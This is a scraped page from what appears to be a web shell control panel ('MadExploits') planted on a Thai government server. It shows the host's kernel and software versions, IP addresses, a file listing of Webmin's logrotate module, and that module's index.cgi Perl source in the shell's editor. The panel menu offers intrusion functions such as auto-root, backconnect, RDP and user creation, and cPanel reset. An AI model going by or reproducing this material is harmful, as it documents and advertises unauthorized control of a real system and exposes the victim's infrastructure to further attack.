Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
logrotate /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
528
B
-rw-r--r--
backup_config.pl
630
B
-rwxr-xr-x
cgi_args.pl
221
B
-rwxr-xr-x
config
67
B
-rw-r--r--
config-ALL-linux
67
B
-rw-r--r--
config-debian-linux
93
B
-rw-r--r--
config-freebsd
142
B
-rw-r--r--
config-open-linux
71
B
-rw-r--r--
config-redhat-linux
93
B
-rw-r--r--
config-solaris-10-ALL
132
B
-rw-r--r--
config-syno-linux
67
B
-rw-r--r--
config.info
288
B
-rw-r--r--
config.info.ca
352
B
-rw-r--r--
config.info.ca.UTF-8
358
B
-rw-r--r--
config.info.cz
325
B
-rw-r--r--
config.info.cz.UTF-8
342
B
-rw-r--r--
config.info.de
353
B
-rw-r--r--
config.info.de.UTF-8
353
B
-rw-r--r--
config.info.es
284
B
-rw-r--r--
config.info.es.UTF-8
284
B
-rw-r--r--
config.info.fr
402
B
-rw-r--r--
config.info.fr.UTF-8
402
B
-rw-r--r--
config.info.hu
0
B
-rw-r--r--
config.info.ja_JP.UTF-8
398
B
-rw-r--r--
config.info.ja_JP.euc
293
B
-rw-r--r--
config.info.ko_KR.UTF-8
276
B
-rw-r--r--
config.info.ko_KR.euc
224
B
-rw-r--r--
config.info.nl
322
B
-rw-r--r--
config.info.nl.UTF-8
322
B
-rw-r--r--
config.info.no
329
B
-rw-r--r--
config.info.no.UTF-8
329
B
-rw-r--r--
config.info.pl
324
B
-rw-r--r--
config.info.pl.UTF-8
334
B
-rw-r--r--
config.info.sk
334
B
-rw-r--r--
config.info.sk.UTF-8
356
B
-rw-r--r--
config.info.tr
288
B
-rw-r--r--
delete_logs.cgi
642
B
-rwxr-xr-x
edit_log.cgi
6.75
KB
-rwxr-xr-x
edit_sched.cgi
1.4
KB
-rwxr-xr-x
force.cgi
570
B
-rwxr-xr-x
index.cgi
3.34
KB
-rwxr-xr-x
install_check.pl
331
B
-rwxr-xr-x
log_parser.pl
605
B
-rwxr-xr-x
logrotate-lib.pl
9.36
KB
-rwxr-xr-x
module.info
203
B
-rw-r--r--
module.info.ca
142
B
-rw-r--r--
module.info.ca.UTF-8
157
B
-rw-r--r--
module.info.cz
29
B
-rw-r--r--
module.info.cz.UTF-8
38
B
-rw-r--r--
module.info.de
126
B
-rw-r--r--
module.info.de.UTF-8
138
B
-rw-r--r--
module.info.es
48
B
-rw-r--r--
module.info.es.UTF-8
54
B
-rw-r--r--
module.info.fr
36
B
-rw-r--r--
module.info.fr.UTF-8
42
B
-rw-r--r--
module.info.hu
42
B
-rw-r--r--
module.info.hu.UTF-8
51
B
-rw-r--r--
module.info.ko_KR.UTF-8
38
B
-rw-r--r--
module.info.ko_KR.euc
30
B
-rw-r--r--
module.info.ms_MY
125
B
-rw-r--r--
module.info.ms_MY.UTF-8
137
B
-rw-r--r--
module.info.nl
25
B
-rw-r--r--
module.info.nl.UTF-8
31
B
-rw-r--r--
module.info.no
25
B
-rw-r--r--
module.info.no.UTF-8
31
B
-rw-r--r--
module.info.pl
110
B
-rw-r--r--
module.info.pl.UTF-8
127
B
-rw-r--r--
module.info.sk
40
B
-rw-r--r--
module.info.sk.UTF-8
50
B
-rw-r--r--
save_log.cgi
6.03
KB
-rwxr-xr-x
save_sched.cgi
936
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.cgi
#!/usr/bin/perl # index.cgi # Show all logs that are being rotated require './logrotate-lib.pl'; # Make sure config file and program exists if (!&has_command($config{'logrotate'})) { &ui_print_header(undef, $text{'index_title'}, "", "intro", 1, 1); print &ui_config_link('index_ecmd', [ "<tt>$config{'logrotate'}</tt>", undef ]),"<p>\n"; &foreign_require("software", "software-lib.pl"); $lnk = &software::missing_install_link( "logrotate", $text{'index_logrotate'}, "../$module_name/", $text{'index_title'}); print $lnk,"<p>\n" if ($lnk); &ui_print_footer("/", $text{'index'}); exit; } if (!-r $config{'logrotate_conf'}) { &ui_print_header(undef, $text{'index_title'}, "", "intro", 1, 1); &ui_print_endpage( &ui_config_link('index_econf', [ "<tt>$config{'logrotate_conf'}</tt>", undef ])); } # Get the version $logrotate_version = &get_logrotate_version(\$out); if (!$logrotate_version) { &ui_print_header(undef, $text{'index_title'}, "", "intro", 1, 1); &ui_print_endpage( &text('index_eversion', "<tt>$config{'logrotate'} -v</tt>", "<pre>$out</pre>")); } &open_tempfile(VERSION, ">$module_config_directory/version"); &print_tempfile(VERSION, "$logrotate_version\n"); &close_tempfile(VERSION); &ui_print_header(undef, $text{'index_title'}, "", "intro", 1, 1, 0, &help_search_link("logrotate", "man", "doc", "google"), undef, undef, &text('index_version', $logrotate_version)); # Show table of log files $conf = &get_config(); $defp = &get_period($conf); foreach $c ($config{'sort_mode'} ? (sort { $a->{'name'}->[0] cmp $b->{'name'}->[0] } @$conf) : @$conf) { if ($c->{'members'}) { local $p = &get_period($c->{'members'}) || $defp; local $r = &find_value("postrotate", $c->{'members'}); $r =~ s/\n/<br>\n/g; push(@table, [ &ui_link("edit_log.cgi?idx=".$c->{'index'}, join(" ", map { "<tt>$_</tt><br>" } @{$c->{'name'}}) ), $text{'period_'.$p} || "<i>$text{'index_notset'}</i>", $r ? "<tt><font size=-1>$r</font></tt>" : "<i>$text{'index_nocmd'}</i>" ]); push(@tablelogs, $c); } } if (@table) { print &ui_form_start("delete_logs.cgi", "post"); @links = ( &select_all_link("d"), &select_invert_link("d"), &ui_link("edit_log.cgi?new=1", $text{'index_add'}) ); print &ui_links_row(\@links); @tds = ( "width=5", "nowrap valign=top", "valign=top", "valign=top" ); print &ui_columns_start([ "", $text{'index_file'}, $text{'index_period'}, $text{'index_post'} ], 100, 0, \@tds); $i = 0; foreach $r (@table) { print &ui_checked_columns_row($r, \@tds, "d", $tablelogs[$i]->{'index'}); $i++; } print &ui_columns_end(); print &ui_links_row(\@links); print &ui_form_end([ [ "delete", $text{'index_delete'} ] ]); } else { print "<p><b>$text{'index_none'}</b><p>\n"; print &ui_link("edit_log.cgi?new=1", $text{'index_add'}); print "<p>\n"; } # Show buttons for editing global config and scheduling print &ui_hr(); print &ui_buttons_start(); print &ui_buttons_row("edit_log.cgi", $text{'index_global'}, $text{'index_globaldesc'}, &ui_hidden("global", 1)); print &ui_buttons_row("edit_sched.cgi", $text{'index_sched'}, $text{'index_scheddesc'}); print &ui_buttons_row("force.cgi", $text{'index_force'}, $text{'index_forcedesc'}); print &ui_buttons_end(); &ui_print_footer("/", $text{'index'});
Close